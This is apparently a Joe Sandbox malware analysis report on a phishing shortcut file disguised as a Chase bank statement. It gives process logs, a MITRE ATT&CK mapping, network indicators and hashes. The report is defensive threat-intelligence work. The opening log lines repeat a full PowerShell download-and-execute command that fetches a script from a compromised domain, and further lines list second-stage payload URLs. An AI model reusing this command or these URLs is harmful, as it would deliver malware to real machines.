Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -com "iwr -useb 'https://admiralpub.ca/wp-content/uploads/2017/oligophosphaturia.php' -outf 'c:\users\user\appdata\local\temp\eglg6djoy9k9.js'; schtasks /delete /tn qwqnybicktrx1y2 /f; wscript c:\users\user\appdata\local\temp\eglg6djoy9k9.js"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -com "iwr -useb 'https://admiralpub.ca/wp-content/uploads/2017/oligophosphaturia.php' -outf 'c:\users\user\appdata\local\temp\eglg6djoy9k9.js'; schtasks /delete /tn qwqnybicktrx1y2 /f; wscript c:\users\user\appdata\local\temp\eglg6djoy9k9.js"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -com "iwr -useb 'https://admiralpub.ca/wp-content/uploads/2017/oligophosphaturia.php' -outf 'c:\users\user\appdata\local\temp\eglg6djoy9k9.js'; schtasks /delete /tn qwqnybicktrx1y2 /f; wscript c:\users\user\appdata\local\temp\eglg6djoy9k9.js"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -com "iwr -useb 'https://admiralpub.ca/wp-content/uploads/2017/oligophosphaturia.php' -outf 'c:\users\user\appdata\local\temp\eglg6djoy9k9.js'; schtasks /delete /tn qwqnybicktrx1y2 /f; wscript c:\users\user\appdata\local\temp\eglg6djoy9k9.js"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
MITRE ATT&CK Matrix (a number preceding a technique name is the report's count badge as extracted)

Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | 11 Scripting | Valid Accounts | 1 Command and Scripting Interpreter | 1 Scheduled Task/Job | 11 Process Injection | 1 Masquerading | OS Credential Dumping | 1 Security Software Discovery | Remote Services | Data from Local System | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | 1 Scheduled Task/Job | 11 Scripting | 1 Scheduled Task/Job | 21 Virtualization/Sandbox Evasion | LSASS Memory | 11 Process Discovery | Remote Desktop Protocol | Data from Removable Media | 1 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | 1 PowerShell | 1 DLL Side-Loading | 1 DLL Side-Loading | 11 Process Injection | Security Account Manager | 21 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | 2 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 Obfuscated Files or Information | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | 13 Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 1 File and Directory Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | Steganography | Cached Domain Credentials | 12 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
[Behavior Graph, ID 1417179; sample chasebank_statement_mar.lnk; start date 28/03/2024; architecture WINDOWS; score 100]
Process tree recovered from the graph: four cmd.exe instances. One cmd.exe starts curl.exe, schtasks.exe and conhost.exe; curl.exe contacts admiralpub.ca (103.26.141.28, port 443, local ports 49706 and 49707, COGECO-PEER1CA, Canada) and 127.0.0.1, and drops C:\Users\user\AppData\...\Pfx5CcXoK0qm.bat (ASCII). The other three cmd.exe instances each start powershell.exe and conhost.exe; each powershell.exe in turn starts wscript.exe, schtasks.exe and conhost.exe, and one of them drops C:\Users\user\AppData\...GLG6DJOY9K9.js (ASCII).
Signatures shown on the graph: Antivirus detection for URL or domain; Antivirus detection for dropped file; Windows shortcut file (LNK) starts blacklisted processes; Suspicious powershell command line found; Uses schtasks.exe or at.exe to add and modify task schedules; Windows Scripting host queries suspicious COM object (likely to drop second stage); 9 other signatures.

Source | Detection | Scanner | Label | Link
chasebank_statement_mar.lnk | 100% | Joe Sandbox ML | |

Source | Detection | Scanner | Label | Link
C:\Users\user\AppData\Local\Temp\EGLG6DJOY9K9.js | 100% | Avira | JS/PShelldldr.MGBK |

No Antivirus matches
No Antivirus matches

Source | Detection | Scanner | Label | Link
http://pesterbdd.com/images/Pester.png | 100% | URL Reputation | malware |
https://go.micro | 0% | URL Reputation | safe |
https://contoso.com/License | 0% | URL Reputation | safe |
https://contoso.com/Icon | 0% | URL Reputation | safe |
http://crl.m | 0% | URL Reputation | safe |
https://contoso.com/ | 0% | URL Reputation | safe |
https://oneget.orgX | 0% | URL Reputation | safe |
https://oneget.org | 0% | URL Reputation | safe |
https://admiralpub.ca/wp-content/uploads/2017/agent3.ps1 | 0% | Avira URL Cloud | safe |
http://admiralpub.ca | 0% | Avira URL Cloud | safe |
https://admiralpub.ca | 0% | Avira URL Cloud | safe |
https://admiralpub.ca/wp-content/ | 0% | Avira URL Cloud | safe |
https://admiralpub.ca/wp-content/uploads/2017/olympiadic.phplW | 0% | Avira URL Cloud | safe |
https://admiralpub.ca/wp-content/uploads/2017/oligophosphaturia.php | 0% | Avira URL Cloud | safe |
http://crl.microsoft8 | 0% | Avira URL Cloud | safe |
https://admiralpub.ca/wp-content/uploads/2017/olympiadic.php | 0% | Avira URL Cloud | safe |
https://admiralpub.ca/wp-content/uploads/2017/olympiadic.phpY | 0% | Avira URL Cloud | safe |
https://admiralpub.ca/wp-content/uploads/2017/agent1.ps1 | 0% | Avira URL Cloud | safe |
NameIPActiveMaliciousAntivirus DetectionReputation
admiralpub.ca
103.26.141.28
truetrue
    unknown
    NameMaliciousAntivirus DetectionReputation
    https://admiralpub.ca/wp-content/uploads/2017/oligophosphaturia.phptrue
    • Avira URL Cloud: safe
    unknown
    https://admiralpub.ca/wp-content/uploads/2017/olympiadic.phptrue
    • Avira URL Cloud: safe
    unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://nuget.org/NuGet.exe | powershell.exe, 00000007.00000002.2053029650.0000023F530ED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2053029650.0000023F53223000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2038635027.0000023F44A2E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2249489725.0000027A1007C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2249489725.0000027A101B2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2203447822.0000027A019B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2794129029.000002AD019B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2883571304.000002AD101AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2883571304.000002AD10074000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.apache.org/licenses/LICENSE-2.0 | powershell.exe, 00000007.00000002.2038635027.0000023F446B2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2203447822.0000027A01640000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2794129029.000002AD0163D000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://admiralpub.ca | powershell.exe, 00000007.00000002.2038635027.0000023F44644000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2203447822.0000027A015D0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2794129029.000002AD015D0000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000015.00000002.2794129029.000002AD0186F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2896152779.000002AD6F486000.00000004.00000020.00020000.00000000.sdmp | true | URL Reputation: malware | unknown
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000015.00000002.2794129029.000002AD0186F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2896152779.000002AD6F486000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://go.micro | powershell.exe, 00000007.00000002.2038635027.0000023F43C9C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2203447822.0000027A00C2B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2794129029.000002AD00C2C000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://admiralpub.ca/wp-content/uploads/2017/olympiadic.phplW | curl.exe, 00000002.00000002.1984030608.00000258B0F87000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://contoso.com/License | powershell.exe, 00000015.00000002.2883571304.000002AD10074000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/Icon | powershell.exe, 00000015.00000002.2883571304.000002AD10074000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://admiralpub.ca/wp-content/ | powershell.exe, 00000007.00000002.2038635027.0000023F4467C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2203447822.0000027A01638000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2794129029.000002AD01608000.00000004.00000800.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown
http://crl.microsoft8 | powershell.exe, 00000015.00000002.2894258629.000002AD6D655000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://admiralpub.ca/wp-content/uploads/2017/olympiadic.phpY | curl.exe, 00000002.00000002.1984030608.00000258B0F87000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://github.com/Pester/Pester | powershell.exe, 00000015.00000002.2794129029.000002AD0186F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2896152779.000002AD6F486000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://admiralpub.ca/wp-content/uploads/2017/agent1.ps1 | wscript.exe, 00000018.00000002.2818480339.00000217B93B5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000018.00000002.2818354957.00000217B91BF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000018.00000003.2817698308.00000217B91AA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000018.00000003.2817679859.00000217B91B6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000018.00000003.2817938071.00000217B91BE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000018.00000003.2816727802.00000217B919C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000018.00000003.2816727802.00000217B91B6000.00000004.00000020.00020000.00000000.sdmp, EGLG6DJOY9K9.js.7.dr | false | Avira URL Cloud: safe | unknown
http://crl.m | powershell.exe, 0000000E.00000002.2260297974.0000027A686B6000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/ | powershell.exe, 00000015.00000002.2883571304.000002AD10074000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://nuget.org/nuget.exe | powershell.exe, 00000007.00000002.2053029650.0000023F530ED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2053029650.0000023F53223000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2038635027.0000023F44A2E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2249489725.0000027A1007C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2249489725.0000027A101B2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2203447822.0000027A019B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2794129029.000002AD019B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2883571304.000002AD101AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2883571304.000002AD10074000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://oneget.orgX | powershell.exe, 00000007.00000002.2038635027.0000023F446B2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2203447822.0000027A01640000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2794129029.000002AD0163D000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://admiralpub.ca | powershell.exe, 00000007.00000002.2038635027.0000023F43C9C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2203447822.0000027A00C2B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2794129029.000002AD01339000.00000004.00000800.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown
https://aka.ms/pscore68 | powershell.exe, 00000007.00000002.2038635027.0000023F43071000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2203447822.0000027A00001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2794129029.000002AD00001000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000007.00000002.2038635027.0000023F43071000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2203447822.0000027A00001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2794129029.000002AD00001000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://admiralpub.ca/wp-content/uploads/2017/agent3.ps1 | wscript.exe, 00000018.00000002.2818480339.00000217B93B5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000018.00000002.2818354957.00000217B91BF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000018.00000003.2817698308.00000217B91AA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000018.00000003.2817679859.00000217B91B6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000018.00000003.2817938071.00000217B91BE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000018.00000003.2816727802.00000217B919C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000018.00000003.2816727802.00000217B91B6000.00000004.00000020.00020000.00000000.sdmp, EGLG6DJOY9K9.js.7.dr | false | Avira URL Cloud: safe | unknown
https://oneget.org | powershell.exe, 00000007.00000002.2038635027.0000023F446B2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2203447822.0000027A01640000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2794129029.000002AD0163D000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs
IP | Domain | Country | ASN | ASN Name | Malicious
103.26.141.28 | admiralpub.ca | Canada | 13768 | COGECO-PEER1CA | true
                  IP
                  127.0.0.1
                  Joe Sandbox version:40.0.0 Tourmaline
                  Analysis ID:1417179
                  Start date and time:2024-03-28 18:10:57 +01:00
                  Joe Sandbox product:CloudBasic
                  Overall analysis duration:0h 4m 55s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                  Number of analysed new started processes analysed:25
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Sample name:chasebank_statement_mar.lnk
                  Detection:MAL
                  Classification:mal100.rans.winLNK@32/16@1/2
                  EGA Information:Failed
                  HCA Information:
                  • Successful, ratio: 100%
                  • Number of executed functions: 1
                  • Number of non-executed functions: 0
                  Cookbook Comments:
                  • Found application associated with file extension: .lnk
                  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                  • Execution Graph export aborted for target powershell.exe, PID 5668 because it is empty
• Not all processes were analyzed; the report is missing behavior information
                  • Report size getting too big, too many NtOpenKeyEx calls found.
                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                  • VT rate limit hit for: chasebank_statement_mar.lnk
Time | Type | Description
18:11:43 | Task Scheduler | Run new task: qWQnYbiCKtrx1y2 path: "C:\Users\user\AppData\Local\Temp\Pfx5CcXoK0qm.bat" s>qWQnYbiCKtrx1y2
18:11:45 | API Interceptor | 32x Sleep call for process: powershell.exe modified
                  No context
                  No context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
COGECO-PEER1CA | https://bafkreiakypngf5p2vusgmzt3htrul7f7hmhpylofrop6cg6waka2djtzz4.ipfs.dweb.link/#katja.lundberg-rand@daiichi-sankyo.eu | malicious | Unknown | 69.90.254.78
 | 97zyqEu4Nh.elf | malicious | Moobot | 66.135.35.54
 | https://arvest-securev2.com/ | malicious | HTMLPhisher | 207.198.113.205
 | https://ioa.pages.dev/account/js-reporting/?crumb=uZ4.07kERLI&message=javascript_not_enabled&ref=%2Faccount%2Fchallenge%2Fpassword | malicious | HTMLPhisher | 69.90.254.78
 | https://trhj.pages.dev/ | malicious | HTMLPhisher | 69.90.254.78
 | https://lanecain-homes.com/ | malicious | Unknown | 69.90.254.78
 | https://xfv.pages.dev/robots.txt | malicious | HTMLPhisher | 69.90.254.78
 | https://jfb.pages.dev/account/js-reporting/?crumb=uZ4.07kERLI&message=javascript_not_enabled&ref=%2Faccount%2Fchallenge%2Fpassword | malicious | HTMLPhisher | 69.90.254.78
 | https://safemarkxxcs.xyz/ | malicious | Unknown | 69.90.254.78
 | AFWaD3vnqR.elf | malicious | Mirai, Gafgyt | 66.111.87.152
Match | Associated Sample Name / URL | Detection | Threat Name | Context
74954a0c86284d0d6e1c4efefe92b521 | SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe | malicious | Discord Token Stealer, XenoRAT, Xmrig | 103.26.141.28
 | SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe | malicious | Unknown | 103.26.141.28
 | w5ks798nGQ.exe | malicious | RedLine | 103.26.141.28
 | chasebank_statement_mar.lnk | malicious | Unknown | 103.26.141.28
 | SecuriteInfo.com.MacOS.ReverseShell-C.28203.22681.exe | malicious | Python Stealer, Creal Stealer | 103.26.141.28
 | SecuriteInfo.com.Heur.17968.23747.msi | malicious | Unknown | 103.26.141.28
 | Microstub.exe | malicious | Unknown | 103.26.141.28
 | Microstub.exe | malicious | Unknown | 103.26.141.28
 | J-JeremieKarg-78462.js | malicious | Unknown | 103.26.141.28
 | J-JeremieKarg-78462.js | malicious | Unknown | 103.26.141.28
3b5074b1b5d032e5620f69f9f700ff0e | Receipt of your email to Peak Plan ID rvwh0kc6Management .msg | malicious | Unknown | 103.26.141.28
 | https://gcv.microsoft.us/kgRWagmalJ | malicious | Unknown | 103.26.141.28
 | BL-SHIPPING INVOICE.exe | malicious | AgentTesla, PureLog Stealer | 103.26.141.28
 | https://drpetre.com/ | malicious | Unknown | 103.26.141.28
 | RFQ__363564546 -PO.exe | malicious | AgentTesla, PureLog Stealer | 103.26.141.28
 | T_240369_S#U0130PAR#U0130S.exe | malicious | AgentTesla, PureLog Stealer | 103.26.141.28
 | proforma invoice.exe | malicious | AgentTesla, PureLog Stealer | 103.26.141.28
 | biden.ps1 | malicious | Unknown | 103.26.141.28
 | QJwM0vJ5mk.exe | malicious | LummaC | 103.26.141.28
 | SecuriteInfo.com.Trojan.Locsyz.2.2D0.720.16964.6395.exe | malicious | AgentTesla, PureLog Stealer | 103.26.141.28
                  No context
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):64
                  Entropy (8bit):0.34726597513537405
                  Encrypted:false
                  SSDEEP:3:Nlll:Nll
                  MD5:446DD1CF97EABA21CF14D03AEBC79F27
                  SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                  SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                  SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                  Malicious:false
                  Preview:@...e...........................................................
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:ASCII text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):1087
                  Entropy (8bit):5.650674719097719
                  Encrypted:false
                  SSDEEP:24:iJFacEC+Czzf5j1IsiRIbeQAxV6wlVICb1P/vMiKLVKLB:E7EP8Vj6xKhslXvMv8N
                  MD5:3D4FFF20EAC9C4B66CBBE96D71F4E958
                  SHA1:BA0D3DECD1616E63A71D910F68A9CC0D6F3E9649
